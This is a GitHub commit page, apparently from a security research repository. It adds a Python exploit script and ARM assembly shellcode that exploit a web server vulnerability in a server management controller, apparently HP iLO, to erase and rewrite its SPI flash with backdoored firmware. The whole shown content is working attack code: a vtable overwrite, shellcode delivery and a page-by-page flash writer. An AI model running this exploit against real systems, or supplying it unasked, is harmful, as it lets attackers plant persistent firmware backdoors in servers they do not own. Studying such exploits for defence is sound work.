-
Notifications
You must be signed in to change notification settings - Fork 79
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
- Add exploit to write backdoored firmware through the web server vul…
…nerability - Fix stability issues in the backdoored firmware - Make exploits great again! Stability++
- Loading branch information
1 parent
00d3859
commit b73d245
Showing
2 changed files
with
254 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,81 @@ | ||
#!/usr/bin/python | ||
|
||
# [WORKING] Write to Flash | ||
|
||
import sys | ||
|
||
from exploit_helpers import * | ||
from hexdump import hexdump | ||
|
||
if len(sys.argv) < 4: | ||
print "[-] usage: %s remote_addr version file_to_write" % sys.argv[0] | ||
sys.exit(1) | ||
|
||
version = sys.argv[2] | ||
o = get_version_info(version) | ||
|
||
addr_start = 0 | ||
chip = 0 | ||
|
||
with open(sys.argv[3], "rb") as fff: | ||
to_write = fff.read() | ||
|
||
if len(to_write) == 0 or (len(to_write) % 0x10000) != 0: | ||
print "[-] Error, file len should be a multiple of 0x10000" | ||
sys.exit(1) | ||
|
||
s = ssl_connector(sys.argv[1], 443) | ||
|
||
print "[*] Assembling shellcode..." | ||
|
||
with open("flash_write_page.S","rb") as fff: | ||
shellcode = fff.read() % ( | ||
o["wbuff_addr"]+0x4000, | ||
o["SSL_Write"], | ||
o["SSL_Read"], | ||
addr_start, | ||
len(to_write), | ||
chip, | ||
o["VComClientSync_Call"], | ||
o["memcpy"] | ||
) | ||
|
||
bin_sc = asm_sc(shellcode) | ||
check_shellcode(bin_sc) | ||
|
||
sc_headers = get_sc_headers(bin_sc) | ||
sc_headers += get_flush_headers() | ||
|
||
vtable_headers = get_vtable_headers(o) | ||
cookies_headers = get_cookies_headers() | ||
|
||
ilo_version = get_xml_version(s, sc_headers + cookies_headers + vtable_headers) | ||
|
||
if version != ilo_version.replace(".",""): | ||
print "[-] Bad version specified in command line" | ||
|
||
ths = fill_threads(sys.argv[1], sc_headers + cookies_headers + vtable_headers) | ||
send_exploit(s, sc_headers + cookies_headers + vtable_headers, o) | ||
stop_threads(ths) | ||
|
||
btmp = "" | ||
out = "" | ||
amount = 0 | ||
to_write_len = len(to_write) | ||
while not btmp.startswith("EOT"): | ||
btmp = s.recv(0x818) | ||
if len(btmp) == 0: | ||
continue | ||
if "EOT" in btmp and len(btmp) < 16: | ||
print "[+] Done" | ||
break | ||
if "RDY" in btmp and len(btmp) < 16: | ||
print "[*] Ready! Send content (%x bytes)" % len(to_write) | ||
for k in xrange(0, to_write_len, 0x10000): | ||
s.send(to_write[k:k+0x10000]) | ||
print "[*] Sent %08x bytes..." % k | ||
else: | ||
amount += unpack_from("<L",btmp)[0] | ||
print "[*] %08x bytes written..." % amount | ||
|
||
|
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,173 @@ | ||
start: | ||
PUSH {R5,R6,R8,LR} | ||
|
||
SUB SP, SP, #4 | ||
|
||
LDR R0, wbuff | ||
LDR R1, rdy | ||
STR R1, [R0] | ||
|
||
LDR R3, SSL_Write | ||
MOV R2, #0x4 | ||
LDR R1, wbuff | ||
MOV R0, R7 | ||
BLX R3 | ||
|
||
MOV R8, #0 | ||
do_page: | ||
|
||
MOV R6, #0 | ||
get_data: | ||
LDR R3, SSL_Read | ||
LDR R2, page_size | ||
LDR R1, wbuff | ||
MOV R5, #0x1000 | ||
ADD R1, R5 | ||
ADD R1, R6 | ||
MOV R0, R7 | ||
BLX R3 | ||
|
||
ADD R6, R0 | ||
|
||
LDR R1, wbuff | ||
STR R0, [R1] | ||
|
||
LDR R3, SSL_Write | ||
MOV R2, #0x8 | ||
LDR R1, wbuff | ||
MOV R0, R7 | ||
BLX R3 | ||
|
||
LDR R0, page_size | ||
CMP R6, R0 | ||
BNE get_data | ||
|
||
erase: | ||
LDR R3, wbuff | ||
LDR R0, off | ||
ADD R3, R3, R0 | ||
LDR R0, addr | ||
ADD R0, R8 | ||
STR R0, [R3] | ||
MOV R1, #0 | ||
STR R1, [R3, #4] | ||
LDR R2, chip | ||
STRB R2, [R3, #9] | ||
|
||
ADD R3, R3, #8 | ||
MOV R2, #0 | ||
STRB R2, [R3, #3] | ||
MOV R2, #0xD8 | ||
STRB R2, [R3, #2] | ||
SUB R3, R3, #8 | ||
|
||
MOV R1, #0xEE | ||
STRB R1, [R3, #0x110] | ||
MOV R0, #1 | ||
STRB R0, [R3, #0x111] | ||
|
||
LDR R5, VComClientSync_Call | ||
MOV R1, R3 | ||
LDR R2, insz | ||
LDR R3, wbuff | ||
LDR R0, off | ||
STR R0, [SP] | ||
ADR R0, svc_name | ||
BLX R5 | ||
|
||
MOV R6, #0 | ||
wloop: | ||
LDR R3, wbuff | ||
LDR R0, off | ||
ADD R3, R3, R0 | ||
LDR R0, addr | ||
ADD R0, R6 | ||
ADD R0, R8 | ||
STR R0, [R3] | ||
MOV R1, #0x100 | ||
STR R1, [R3, #4] | ||
LDR R2, chip | ||
STRB R2, [R3, #9] | ||
|
||
ADD R3, R3, #8 | ||
MOV R2, #0 | ||
STRB R2, [R3, #3] | ||
MOV R2, #0x2 | ||
STRB R2, [R3, #2] | ||
SUB R3, R3, #8 | ||
|
||
MOV R1, #0xEE | ||
STRB R1, [R3, #0x110] | ||
MOV R0, #1 | ||
STRB R0, [R3, #0x111] | ||
|
||
MOV R5, R3 | ||
|
||
MOV R2, #0x100 | ||
LDR R1, wbuff | ||
MOV R3, #0x1000 | ||
ADD R1, R3 | ||
ADD R1, R6 | ||
MOV R0, R5 | ||
ADD R0, #8 | ||
ADD R0, #5 | ||
LDR R3, memcpy | ||
BLX R3 | ||
|
||
MOV R1, R5 | ||
LDR R5, VComClientSync_Call | ||
LDR R2, insz | ||
LDR R3, wbuff | ||
LDR R0, off | ||
STR R0, [SP] | ||
ADR R0, svc_name | ||
BLX R5 | ||
|
||
ADD R6, #0x100 | ||
LDR R0, page_size | ||
CMP R6, R0 | ||
BNE wloop | ||
|
||
LDR R0, page_size | ||
ADD R8, R0 | ||
LDR R0, memcount | ||
CMP R8, R0 | ||
BNE do_page | ||
|
||
theend: | ||
LDR R0, wbuff | ||
LDR R1, eot | ||
STR R1, [R0] | ||
|
||
LDR R3, SSL_Write | ||
MOV R2, #0x8 | ||
LDR R1, wbuff | ||
MOV R0, R7 | ||
BLX R3 | ||
|
||
ADD SP, SP, #4 | ||
|
||
MOV R0, -257 | ||
POP {R5,R6,R8,LR} | ||
BX LR | ||
|
||
wbuff: .word 0x%x | ||
SSL_Write: .word 0x%x | ||
SSL_Read: .word 0x%x | ||
|
||
wsize: .word 0x818 | ||
off: .word 0x408 | ||
insz: .word 0x114 | ||
addr: .word 0x%x | ||
memcount: .word 0x%x | ||
chip: .word 0x%x | ||
VComClientSync_Call: .word 0x%x | ||
memcpy: .word 0x%x | ||
page_size: .word 0x10000 | ||
svc_name: .string "SpiService" | ||
.align | ||
eot: .string "EOT" | ||
.align | ||
rdy: .string "RDY" | ||
.align | ||
final: .word 0x41414141 |